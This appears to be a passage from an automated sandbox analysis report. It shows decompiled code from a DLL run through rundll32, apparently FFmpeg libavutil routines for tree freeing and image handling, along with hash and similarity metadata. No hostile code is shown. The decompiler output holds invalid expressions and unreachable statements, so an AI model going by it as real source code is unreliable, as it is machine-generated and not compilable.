                                                      				signed int _t72;
                                                      				signed int _t73;
                                                      				signed int _t74;
                                                      				signed int _t75;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr* _t84;
                                                      				intOrPtr* _t87;
                                                      				intOrPtr* _t93;
                                                      				void* _t94;
                                                      				intOrPtr* _t95;
                                                      
                                                      				_t95 = _t94 - 0x2c;
                                                      				_t87 =  *((intOrPtr*)(_t95 + 0x40));
                                                      				if(_t87 != 0) {
                                                      					if( *((intOrPtr*)(_t87 + 0xc)) == 0) {
                                                      						L4:
                                                      						_t84 =  *((intOrPtr*)(_t87 + 0x1c));
                                                      						if(_t84 == 0) {
                                                      							L21:
                                                      							 *_t95 =  *_t87;
                                                      							L23();
                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 8));
                                                      							L23();
                                                      							 *_t95 =  *((intOrPtr*)(_t87 + 0x14));
                                                      							L23();
                                                      							 *((intOrPtr*)(_t95 + 0x40)) = _t87;
                                                      							return __imp___aligned_free();
                                                      						}
                                                      						if( *((intOrPtr*)(_t84 + 0xc)) == 0) {
                                                      							L8:
                                                      							_t93 =  *((intOrPtr*)(_t84 + 0x1c));
                                                      							if(_t93 == 0) {
                                                      								L20:
                                                      								 *_t95 =  *_t84;
                                                      								L23();
                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 8));
                                                      								L23();
                                                      								 *_t95 =  *((intOrPtr*)(_t84 + 0x14));
                                                      								L23();
                                                      								 *_t95 = _t84;
                                                      								L23();
                                                      								goto L21;
                                                      							}
                                                      							if( *((intOrPtr*)(_t93 + 0xc)) == 0) {
                                                      								L12:
                                                      								_t78 =  *((intOrPtr*)(_t93 + 0x1c));
                                                      								if(_t78 == 0) {
                                                      									L19:
                                                      									 *_t95 =  *_t93;
                                                      									L23();
                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 8));
                                                      									L23();
                                                      									 *_t95 =  *((intOrPtr*)(_t93 + 0x14));
                                                      									L23();
                                                      									 *_t95 = _t93;
                                                      									L23();
                                                      									goto L20;
                                                      								}
                                                      								if( *((intOrPtr*)(_t78 + 0xc)) == 0) {
                                                      									L16:
                                                      									_t55 =  *((intOrPtr*)(_t78 + 0x1c));
                                                      									if( *((intOrPtr*)(_t78 + 0x1c)) != 0) {
                                                      										 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                      										E10012850(_t55);
                                                      										_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                      									}
                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                      									 *_t95 =  *_t78;
                                                      									L23();
                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 8));
                                                      									L23();
                                                      									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t95 + 0x1c)) + 0x14));
                                                      									L23();
                                                      									 *_t95 =  *((intOrPtr*)(_t95 + 0x1c));
                                                      									L23();
                                                      									goto L19;
                                                      								}
                                                      								_t72 = 0;
                                                      								do {
                                                      									 *((intOrPtr*)(_t95 + 0x1c)) = _t78;
                                                      									_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t78 + 8)) + _t72 * 4));
                                                      									_t72 = _t72 + 1;
                                                      									 *_t95 = _t61;
                                                      									L23();
                                                      									_t78 =  *((intOrPtr*)(_t95 + 0x1c));
                                                      								} while (_t72 <  *((intOrPtr*)(_t78 + 0xc)));
                                                      								goto L16;
                                                      							}
                                                      							_t73 = 0;
                                                      							do {
                                                      								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t93 + 8)) + _t73 * 4));
                                                      								_t73 = _t73 + 1;
                                                      								 *_t95 = _t63;
                                                      								L23();
                                                      							} while (_t73 <  *((intOrPtr*)(_t93 + 0xc)));
                                                      							goto L12;
                                                      						}
                                                      						_t74 = 0;
                                                      						do {
                                                      							_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 8)) + _t74 * 4));
                                                      							_t74 = _t74 + 1;
                                                      							 *_t95 = _t65;
                                                      							L23();
                                                      						} while (_t74 <  *((intOrPtr*)(_t84 + 0xc)));
                                                      						goto L8;
                                                      					}
                                                      					_t75 = 0;
                                                      					do {
                                                      						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 8)) + _t75 * 4));
                                                      						_t75 = _t75 + 1;
                                                      						 *_t95 = _t67;
                                                      						L23();
                                                      					} while (_t75 <  *((intOrPtr*)(_t87 + 0xc)));
                                                      					goto L4;
                                                      				}
                                                      				return _t43;
                                                      			}



















                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbd52e100bb25c0641e34a9b4921baf3855db5dcfffc71db4c92606c3f5dca5a
                                                      • Instruction ID: 64132198df639edcb8f9d9942dd31ac045c1fee33f6b38aeafb66a389db015b7
                                                      • Opcode Fuzzy Hash: cbd52e100bb25c0641e34a9b4921baf3855db5dcfffc71db4c92606c3f5dca5a
                                                      • Instruction Fuzzy Hash: 2851AE79A04B518FCB10EF79D4C595AF7E0FF48214F41892DE9A98B309EB30F9858B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: mv_tree_find$mv_tree_insert
                                                      • String ID:
                                                      • API String ID: 3047205218-0
                                                      • Opcode ID: 80c4f16b25e93cf13fac10a13682a04c4d944ea14c030e41bdf2d1b908fff40c
                                                      • Instruction ID: a50688713867d27fbf14d738fefbaa6eb2d970f68efb82bc5577a16e2e7c4afa
                                                      • Opcode Fuzzy Hash: 80c4f16b25e93cf13fac10a13682a04c4d944ea14c030e41bdf2d1b908fff40c
                                                      • Instruction Fuzzy Hash: 7152CF75A087499FC344DF1AC08091AFBE2FFC8654F658A2DE889DB315E730E9418F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 35%
                                                      			E1002082C(signed int __edx, void* __eflags) {
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				unsigned int _t304;
                                                      				char* _t305;
                                                      				signed int _t314;
                                                      				signed int _t316;
                                                      				signed int _t325;
                                                      				signed int _t330;
                                                      				signed int _t331;
                                                      				signed int _t332;
                                                      				int _t335;
                                                      				signed int _t336;
                                                      				signed int _t338;
                                                      				signed int _t342;
                                                      				signed int _t344;
                                                      				signed int _t347;
                                                      				signed int _t348;
                                                      				signed char* _t350;
                                                      				signed int _t351;
                                                      				int _t352;
                                                      				signed int _t354;
                                                      				int _t355;
                                                      				signed int _t356;
                                                      				signed int _t358;
                                                      				int _t361;
                                                      				signed int _t362;
                                                      				void _t364;
                                                      				signed int _t365;
                                                      				signed int _t367;
                                                      				signed int _t369;
                                                      				signed int _t372;
                                                      				intOrPtr _t379;
                                                      				intOrPtr _t380;
                                                      				intOrPtr _t381;
                                                      				intOrPtr _t382;
                                                      				intOrPtr _t383;
                                                      				intOrPtr _t384;
                                                      				signed int _t386;
                                                      				signed int _t388;
                                                      				char* _t389;
                                                      				signed int _t393;
                                                      				signed char _t398;
                                                      				void* _t399;
                                                      				char* _t405;
                                                      				char _t406;
                                                      				char* _t408;
                                                      				signed int _t409;
                                                      				signed char _t411;
                                                      				signed int _t413;
                                                      				signed int _t414;
                                                      				signed int _t417;
                                                      				signed int _t418;
                                                      				signed short _t425;
                                                      				void* _t429;
                                                      				char* _t430;
                                                      				unsigned int _t434;
                                                      				signed int _t435;
                                                      				signed int _t437;
                                                      				signed char _t439;
                                                      				signed char* _t440;
                                                      				unsigned int _t441;
                                                      				signed int _t442;
                                                      				int _t444;
                                                      				signed char _t449;
                                                      				void* _t450;
                                                      				signed int _t453;
                                                      				signed int _t454;
                                                      				intOrPtr _t455;
                                                      				signed char _t456;
                                                      				signed char _t457;
                                                      				int _t458;
                                                      				char* _t463;
                                                      				char* _t464;
                                                      				signed int _t465;
                                                      				signed int _t467;
                                                      				signed int _t471;
                                                      				signed int _t474;
                                                      				signed int _t475;
                                                      				signed int _t477;
                                                      				signed int _t479;
                                                      				signed int* _t484;
                                                      				signed int _t489;
                                                      				signed int _t494;
                                                      				void _t495;
                                                      				char* _t496;
                                                      				signed int _t498;
                                                      				void* _t499;
                                                      				signed int _t501;
                                                      				void* _t502;
                                                      				void* _t503;
                                                      				signed int _t507;
                                                      				intOrPtr _t508;
                                                      				intOrPtr _t509;
                                                      				void* _t514;
                                                      				signed int _t517;
                                                      				char* _t519;
                                                      				signed int _t526;
                                                      				signed int _t528;
                                                      				int _t533;
                                                      				signed int _t534;
                                                      				void* _t537;
                                                      				signed int* _t538;
                                                      				signed int _t539;
                                                      				char* _t540;
                                                      				void* _t541;
                                                      				unsigned int _t543;
                                                      				unsigned int _t544;
                                                      				signed int _t545;
                                                      				signed int _t547;
                                                      				signed int _t548;
                                                      				signed int _t549;
                                                      				signed int _t550;
                                                      				signed int _t552;
                                                      				int _t553;
                                                      				void* _t554;
                                                      				char** _t555;
                                                      				signed int* _t557;
                                                      				void* _t571;
                                                      
                                                      				_t465 = __edx;
                                                      				_t555 = _t554 - 0x6c;
                                                      				_t408 = _t555[0x24];
                                                      				_t519 = _t555[0x22];
                                                      				_t555[3] = _t555[0x27];
                                                      				 *_t555 = _t408;
                                                      				_t555[2] = _t555[0x26];
                                                      				_t555[1] = _t555[0x25];
                                                      				_t304 = E10020660(__edx, __eflags);
                                                      				 *_t555 = _t408;
                                                      				_t543 = _t304;
                                                      				_t305 = L10031C70();
                                                      				_t555[0x12] = _t305;
                                                      				_t430 = _t305;
                                                      				if((_t543 >> 0x0000001f | _t465 & 0xffffff00 | _t543 - _t555[0x21] > 0x00000000) != 0 || _t430 == 0) {
                                                      					_t544 = 0xffffffea;
                                                      					goto L28;
                                                      				} else {
                                                      					_t467 = _t430[4] & 0x000000ff;
                                                      					if(_t467 == 0) {
                                                      						_t496 = 0;
                                                      						_t555[0xf] = 0;
                                                      					} else {
                                                      						_t463 =  >=  ? _t430[0x10] : 0;
                                                      						_t555[0xf] = _t463;
                                                      						_t496 = _t463;
                                                      						if(_t467 != 1) {
                                                      							_t464 = _t555[0x12];
                                                      							_t496 =  >=  ? _t555[0xf] : _t464[0x24];
                                                      							_t555[0xf] = _t496;
                                                      							if(_t467 != 2) {
                                                      								_t405 =  >=  ? _t496 : _t464[0x38];
                                                      								_t555[0xf] = _t405;
                                                      								_t496 = _t405;
                                                      								if(_t467 != 3) {
                                                      									_t406 = _t464[0x4c];
                                                      									_t571 = _t496 - _t406;
                                                      									_t407 =  >=  ? _t496 : _t406;
                                                      									_t555[0xf] =  >=  ? _t496 : _t406;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_t555[1] = _t408;
                                                      					_t555[2] = _t555[0x25];
                                                      					 *_t555 =  &(_t555[0x14]);
                                                      					if(L1001EAB0(_t571) < 0) {
                                                      						_t555[5] = 0x209;
                                                      						_t555[1] = 0;
                                                      						 *_t555 = 0;
                                                      						_t555[4] = "libavutil/imgutils.c";
                                                      						_t555[3] = "ret >= 0";
                                                      						_t555[2] = "Assertion %s failed at %s:%d\n";
                                                      						L10023A40();
                                                      						abort();
                                                      						_push(_t543);
                                                      						_push(_t496);
                                                      						_t557 = _t555 - 0x15c;
                                                      						_t409 = _t557[0x5e];
                                                      						 *_t557 = _t409;
                                                      						_t314 = L10031C70(_t408);
                                                      						 *_t557 = _t409;
                                                      						_t545 = _t314;
                                                      						_t557[0xd] = L10031D50(_t519);
                                                      						_t316 = 0;
                                                      						__eflags = 0;
                                                      						do {
                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd0)) = 0;
                                                      							 *((intOrPtr*)(_t557 + _t316 + 0xd4)) = 0;
                                                      							_t316 = _t316 + 8;
                                                      							__eflags = _t316 - 0x80;
                                                      						} while (_t316 < 0x80);
                                                      						_t557[0x14] = 0;
                                                      						_t557[0x15] = 0;
                                                      						_t557[0x16] = 0;
                                                      						_t557[0x17] = 0;
                                                      						_t557[0x18] = 0;
                                                      						_t557[0x19] = 0;
                                                      						_t557[0x1a] = 0;
                                                      						_t557[0x1b] = 0;
                                                      						__eflags = _t557[0xd] - 1 - 3;
                                                      						if(_t557[0xd] - 1 > 3) {
                                                      							L60:
                                                      							return 0xffffffea;
                                                      						} else {
                                                      							__eflags = _t545;
                                                      							if(_t545 == 0) {
                                                      								goto L60;
                                                      							} else {
                                                      								_t325 =  *(_t545 + 8);
                                                      								_t471 = _t325 & 0x00000008;
                                                      								_t498 = _t471;
                                                      								__eflags = _t498;
                                                      								if(_t498 != 0) {
                                                      									goto L60;
                                                      								} else {
                                                      									_t557[0xa] = _t325 & 0x00000020;
                                                      									__eflags = _t325 & 0x00000004;
                                                      									if(__eflags != 0) {
                                                      										 *_t557 = _t409;
                                                      										_t557[2] = 0;
                                                      										_t557[1] = _t557[0x60];
                                                      										_t547 = L1001E960(__eflags);
                                                      										_t330 = _t409 - 9;
                                                      										__eflags = _t330 - 1;
                                                      										_t331 = _t330 & 0xffffff00 | _t330 - 0x00000001 < 0x00000000;
                                                      										__eflags = _t409 - 9;
                                                      										_t411 =  !=  ? _t498 : 0xff;
                                                      										__eflags = _t557[0xd] - 1;
                                                      										if(__eflags != 0 || __eflags == 0) {
                                                      											goto L60;
                                                      										} else {
                                                      											__eflags = _t547;
                                                      											if(_t547 <= 0) {
                                                      												goto L60;
                                                      											} else {
                                                      												__eflags = _t557[0x5c];
                                                      												if(_t557[0x5c] != 0) {
                                                      													__eflags = _t557[0x61];
                                                      													_t526 =  *(_t557[0x5c]);
                                                      													if(_t557[0x61] > 0) {
                                                      														_t335 = (_t411 & 0x000000ff) * 0x1010101;
                                                      														__eflags = _t335;
                                                      														do {
                                                      															__eflags = _t547 - 8;
                                                      															_t474 = _t547;
                                                      															_t499 = _t526;
                                                      															if(_t547 >= 8) {
                                                      																__eflags = _t526 & 0x00000001;
                                                      																if((_t526 & 0x00000001) != 0) {
                                                      																	 *_t526 = _t335;
                                                      																	_t499 = _t526 + 1;
                                                      																	_t226 = _t547 - 1; // -1
                                                      																	_t474 = _t226;
                                                      																}
                                                      																__eflags = _t499 & 0x00000002;
                                                      																if((_t499 & 0x00000002) != 0) {
                                                      																	 *_t499 = _t335;
                                                      																	_t474 = _t474 - 2;
                                                      																	_t499 = _t499 + 2;
                                                      																}
                                                      																__eflags = _t499 & 0x00000004;
                                                      																if((_t499 & 0x00000004) != 0) {
                                                      																	 *_t499 = _t335;
                                                      																	_t474 = _t474 - 4;
                                                      																	_t499 = _t499 + 4;
                                                      																}
                                                      																_t434 = _t474;
                                                      																_t474 = _t474 & 0x00000003;
                                                      																_t435 = _t434 >> 2;
                                                      																_t335 = memset(_t499, _t335, _t435 << 2);
                                                      																_t557 =  &(_t557[3]);
                                                      																_t499 = _t499 + _t435;
                                                      															}
                                                      															_t475 = _t474 & 0x00000007;
                                                      															__eflags = _t475;
                                                      															if(_t475 != 0) {
                                                      																_t437 = 0;
                                                      																__eflags = 0;
                                                      																do {
                                                      																	 *(_t499 + _t437) = _t411;
                                                      																	_t437 = _t437 + 1;
                                                      																	__eflags = _t437 - _t475;
                                                      																} while (_t437 < _t475);
                                                      															}
                                                      															_t526 = _t526 +  *(_t557[0x5d]);
                                                      															_t216 =  &(_t557[0x61]);
                                                      															 *_t216 = _t557[0x61] - 1;
                                                      															__eflags =  *_t216;
                                                      														} while ( *_t216 != 0);
                                                      													}
                                                      												}
                                                      												goto L77;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										_t477 =  *(_t545 + 4) & 0x000000ff;
                                                      										__eflags = _t477;
                                                      										if(__eflags == 0) {
                                                      											L57:
                                                      											_t557[0xa] = _t545;
                                                      											_t501 = _t557[0x60];
                                                      											_t548 = 0;
                                                      											_t528 = _t557[0xd];
                                                      											while(1) {
                                                      												_t557[2] = _t548;
                                                      												_t557[1] = _t501;
                                                      												 *_t557 = _t409;
                                                      												_t336 = L1001E960(__eflags);
                                                      												 *(_t557 + 0x60 + _t548 * 4) = _t336;
                                                      												__eflags = _t336;
                                                      												if(_t336 < 0) {
                                                      													goto L60;
                                                      												}
                                                      												_t548 = _t548 + 1;
                                                      												__eflags = _t528 - _t548;
                                                      												if(__eflags <= 0) {
                                                      													_t549 = _t557[0xa];
                                                      													__eflags = _t557[0x5c];
                                                      													if(_t557[0x5c] == 0) {
                                                      														L77:
                                                      														_t332 = 0;
                                                      														__eflags = 0;
                                                      													} else {
                                                      														_t557[0x13] = _t549;
                                                      														__eflags = 0;
                                                      														_t557[0xe] =  &(_t557[0x34]);
                                                      														_t557[0xa] = 0;
                                                      														do {
                                                      															_t338 = _t557[0xa];
                                                      															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
                                                      															_t550 =  *(_t557[0x5c] + _t338 * 4);
                                                      															__eflags = _t338 - 1 - 1;
                                                      															if(_t338 - 1 <= 1) {
                                                      																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
                                                      																_t342 = 1 << _t439;
                                                      															} else {
                                                      																_t342 = 1;
                                                      																_t439 = 0;
                                                      																__eflags = 0;
                                                      															}
                                                      															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
                                                      															_t557[0xc] = _t344;
                                                      															__eflags = _t344;
                                                      															if(_t344 > 0) {
                                                      																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
                                                      																_t347 = _t557[0xf];
                                                      																_t557[0xb] = _t413;
                                                      																__eflags = _t347 - _t413;
                                                      																_t533 =  >  ? _t413 : _t347;
                                                      																_t557[0x10] = _t533;
                                                      																_t348 = _t347 - _t533;
                                                      																__eflags = _t348;
                                                      																_t557[0x11] = _t348;
                                                      																do {
                                                      																	_t534 = _t557[0xb];
                                                      																	__eflags = _t534;
                                                      																	if(_t534 != 0) {
                                                      																		_t350 = _t557[0xe];
                                                      																		_t479 =  *_t350 & 0x000000ff;
                                                      																		_t440 =  &(_t350[_t534]);
                                                      																		while(1) {
                                                      																			__eflags =  *_t350 - _t479;
                                                      																			if( *_t350 != _t479) {
                                                      																				break;
                                                      																			}
                                                      																			_t350 =  &(_t350[1]);
                                                      																			__eflags = _t440 - _t350;
                                                      																			if(_t440 == _t350) {
                                                      																				L102:
                                                      																				_t351 = _t557[0xf];
                                                      																				_t502 = _t550;
                                                      																				__eflags = _t351 - 8;
                                                      																				_t414 = _t351;
                                                      																				if(_t351 >= 8) {
                                                      																					_t352 = _t479 * 0x1010101;
                                                      																					__eflags = _t550 & 0x00000001;
                                                      																					if((_t550 & 0x00000001) != 0) {
                                                      																						 *_t550 = _t352;
                                                      																						_t502 = _t550 + 1;
                                                      																						_t414 = _t557[0xf] - 1;
                                                      																					}
                                                      																					__eflags = _t502 & 0x00000002;
                                                      																					if((_t502 & 0x00000002) != 0) {
                                                      																						 *_t502 = _t352;
                                                      																						_t414 = _t414 - 2;
                                                      																						_t502 = _t502 + 2;
                                                      																					}
                                                      																					__eflags = _t502 & 0x00000004;
                                                      																					if((_t502 & 0x00000004) != 0) {
                                                      																						 *_t502 = _t352;
                                                      																						_t414 = _t414 - 4;
                                                      																						_t502 = _t502 + 4;
                                                      																					}
                                                      																					_t441 = _t414;
                                                      																					_t414 = _t414 & 0x00000003;
                                                      																					_t442 = _t441 >> 2;
                                                      																					memset(_t502, _t352, _t442 << 2);
                                                      																					_t557 =  &(_t557[3]);
                                                      																					_t502 = _t502 + _t442;
                                                      																				}
                                                      																				_t413 = _t414 & 0x00000007;
                                                      																				__eflags = _t413;
                                                      																				if(_t413 != 0) {
                                                      																					_t354 = 0;
                                                      																					__eflags = 0;
                                                      																					do {
                                                      																						 *(_t502 + _t354) = _t479;
                                                      																						_t354 = _t354 + 1;
                                                      																						__eflags = _t354 - _t413;
                                                      																					} while (_t354 < _t413);
                                                      																				}
                                                      																			} else {
                                                      																				continue;
                                                      																			}
                                                      																			goto L99;
                                                      																		}
                                                      																		__eflags = _t557[0xb] - 1;
                                                      																		if(_t557[0xb] == 1) {
                                                      																			goto L102;
                                                      																		} else {
                                                      																			_t355 = _t557[0x10];
                                                      																			_t503 = _t550;
                                                      																			_t537 = _t557[0xe];
                                                      																			__eflags = _t355 - 8;
                                                      																			_t444 = _t355;
                                                      																			if(_t355 >= 8) {
                                                      																				__eflags = _t550 & 0x00000001;
                                                      																				if((_t550 & 0x00000001) != 0) {
                                                      																					_t356 =  *_t537 & 0x000000ff;
                                                      																					_t503 = _t550 + 1;
                                                      																					_t537 = _t537 + 1;
                                                      																					_t557[0x12] = _t356;
                                                      																					 *_t550 = _t356;
                                                      																					_t444 = _t557[0x10] - 1;
                                                      																				}
                                                      																				__eflags = _t503 & 0x00000002;
                                                      																				if((_t503 & 0x00000002) != 0) {
                                                      																					_t358 =  *_t537 & 0x0000ffff;
                                                      																					_t503 = _t503 + 2;
                                                      																					_t537 = _t537 + 2;
                                                      																					_t444 = _t444 - 2;
                                                      																					 *(_t503 - 2) = _t358;
                                                      																				}
                                                      																				__eflags = _t503 & 0x00000004;
                                                      																				if((_t503 & 0x00000004) != 0) {
                                                      																					_t364 =  *_t537;
                                                      																					_t503 = _t503 + 4;
                                                      																					_t537 = _t537 + 4;
                                                      																					_t444 = _t444 - 4;
                                                      																					 *(_t503 - 4) = _t364;
                                                      																				}
                                                      																			}
                                                      																			memcpy(_t503, _t537, _t444);
                                                      																			_t557 =  &(_t557[3]);
                                                      																			_t557[2] = _t557[0x11];
                                                      																			_t361 = _t557[0x10];
                                                      																			_t557[1] = _t361;
                                                      																			_t362 = _t361 + _t550;
                                                      																			__eflags = _t362;
                                                      																			 *_t557 = _t362;
                                                      																			L10026D10(_t413, _t537 + _t444 + _t444, _t537);
                                                      																		}
                                                      																	}
                                                      																	L99:
                                                      																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
                                                      																	_t267 =  &(_t557[0xc]);
                                                      																	 *_t267 = _t557[0xc] - 1;
                                                      																	__eflags =  *_t267;
                                                      																} while ( *_t267 != 0);
                                                      															}
                                                      															_t557[0xa] = _t557[0xa] + 1;
                                                      															_t557[0xe] = _t557[0xe] + 0x20;
                                                      															__eflags = _t557[0xd] - _t557[0xa];
                                                      														} while (_t557[0xd] > _t557[0xa]);
                                                      														_t332 = 0;
                                                      													}
                                                      													return _t332;
                                                      												} else {
                                                      													continue;
                                                      												}
                                                      												goto L121;
                                                      											}
                                                      											goto L60;
                                                      										} else {
                                                      											_t365 =  *(_t545 + 0x14);
                                                      											__eflags = _t365;
                                                      											_t447 =  >=  ? _t365 : 0;
                                                      											__eflags = _t365 - 0x20;
                                                      											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
                                                      											if(_t365 > 0x20) {
                                                      												goto L60;
                                                      											} else {
                                                      												__eflags = _t477 - 1;
                                                      												if(__eflags == 0) {
                                                      													L45:
                                                      													_t557[0x5e] = _t409;
                                                      													_t557[0xa] = _t545;
                                                      													_t367 = _t557[0xa];
                                                      													_t557[0xc] = __eflags == 0;
                                                      													_t145 = _t545 + 0x10; // 0x10
                                                      													_t538 = _t145;
                                                      													__eflags = _t557[0x5f] - 2;
                                                      													_t557[0xe] = _t367;
                                                      													_t507 = 0;
                                                      													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
                                                      													__eflags = _t369;
                                                      													_t557[0xb] = _t369;
                                                      													while(1) {
                                                      														_t449 = _t538[4];
                                                      														asm("cdq");
                                                      														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
                                                      														_t557[0x20] = 0;
                                                      														_t557[0x21] = 0;
                                                      														__eflags = _t449 - 0x10;
                                                      														_t557[0x22] = 0;
                                                      														_t557[0x23] = 0;
                                                      														if(_t449 > 0x10) {
                                                      															goto L60;
                                                      														}
                                                      														__eflags = _t449 - 7;
                                                      														if(_t449 > 7) {
                                                      															L49:
                                                      															__eflags = _t372;
                                                      															if(_t372 <= 0) {
                                                      																goto L60;
                                                      															} else {
                                                      																__eflags = _t507;
                                                      																if(_t507 != 0) {
                                                      																	L61:
                                                      																	_t199 = _t507 - 1; // -1
                                                      																	_t417 = 0;
                                                      																	__eflags = _t199 - 1;
                                                      																	if(_t199 <= 1) {
                                                      																		__eflags = _t557[0xe];
                                                      																		if(_t557[0xe] == 0) {
                                                      																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
                                                      																		}
                                                      																	} else {
                                                      																		__eflags = _t507 - 3;
                                                      																		if(_t507 == 3) {
                                                      																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
                                                      																		}
                                                      																	}
                                                      																} else {
                                                      																	__eflags = _t557[0xb];
                                                      																	if(_t557[0xb] == 0) {
                                                      																		goto L61;
                                                      																	} else {
                                                      																		_t425 = 0x10 << _t449 - 8;
                                                      																		__eflags = _t425;
                                                      																		_t417 = _t425 & 0x0000ffff;
                                                      																	}
                                                      																}
                                                      																_t552 =  &(_t557[0x24]);
                                                      																_t450 = _t552 + _t372 * 2;
                                                      																_t484 = _t552;
                                                      																do {
                                                      																	 *_t484 = _t417;
                                                      																	_t484 =  &(_t484[0]);
                                                      																	__eflags = _t450 - _t484;
                                                      																} while (_t450 != _t484);
                                                      																_t418 = _t557[0xa];
                                                      																_t538 =  &(_t538[5]);
                                                      																_t557[7] = _t372;
                                                      																_t557[5] = 0;
                                                      																_t557[0x1c] =  &(_t557[0x34]);
                                                      																_t557[4] = 0;
                                                      																_t557[0x1d] =  &(_t557[0x3c]);
                                                      																_t557[2] =  &(_t557[0x20]);
                                                      																_t557[0x1e] =  &(_t557[0x44]);
                                                      																_t557[6] = _t507;
                                                      																_t507 = _t507 + 1;
                                                      																_t557[1] =  &(_t557[0x1c]);
                                                      																_t557[3] = _t418;
                                                      																 *_t557 = _t552;
                                                      																_t557[0x1f] =  &(_t557[0x4c]);
                                                      																E100316F0();
                                                      																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
                                                      																if(__eflags > 0) {
                                                      																	continue;
                                                      																} else {
                                                      																	_t545 = _t557[0xa];
                                                      																	_t409 = _t557[0x5e];
                                                      																	goto L57;
                                                      																}
                                                      															}
                                                      														} else {
                                                      															__eflags = _t557[0xc];
                                                      															if(_t557[0xc] != 0) {
                                                      																goto L60;
                                                      															} else {
                                                      																goto L49;
                                                      															}
                                                      														}
                                                      														goto L121;
                                                      													}
                                                      													goto L60;
                                                      												} else {
                                                      													_t453 =  *(_t545 + 0x24);
                                                      													_t508 =  *((intOrPtr*)(_t545 + 0x28));
                                                      													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
                                                      													__eflags = _t379 - _t508;
                                                      													_t380 =  <  ? _t508 : _t379;
                                                      													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
                                                      													__eflags = _t380 - 0x20;
                                                      													if(_t380 > 0x20) {
                                                      														goto L60;
                                                      													} else {
                                                      														__eflags = _t477 - 2;
                                                      														if(__eflags == 0) {
                                                      															goto L45;
                                                      														} else {
                                                      															_t454 =  *(_t545 + 0x38);
                                                      															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
                                                      															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
                                                      															__eflags = _t381 - _t509;
                                                      															_t382 =  <  ? _t509 : _t381;
                                                      															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
                                                      															__eflags = _t382 - 0x20;
                                                      															if(_t382 > 0x20) {
                                                      																goto L60;
                                                      															} else {
                                                      																__eflags = _t477 - 3;
                                                      																if(__eflags == 0) {
                                                      																	goto L45;
                                                      																} else {
                                                      																	_t489 =  *(_t545 + 0x4c);
                                                      																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
                                                      																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
                                                      																	__eflags = _t383 - _t455;
                                                      																	_t384 =  <  ? _t455 : _t383;
                                                      																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
                                                      																	__eflags = _t384 - 0x20;
                                                      																	if(__eflags > 0) {
                                                      																		goto L60;
                                                      																	} else {
                                                      																		goto L45;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t456 = 0;
                                                      						_t555[0x22] = _t519;
                                                      						_t539 = 0xffffffff;
                                                      						_t555[0x13] = _t543;
                                                      						_t555[0xe] = _t555[0x23];
                                                      						_t386 = 1;
                                                      						_t555[0x11] =  ~(_t555[0x27]);
                                                      						while(1) {
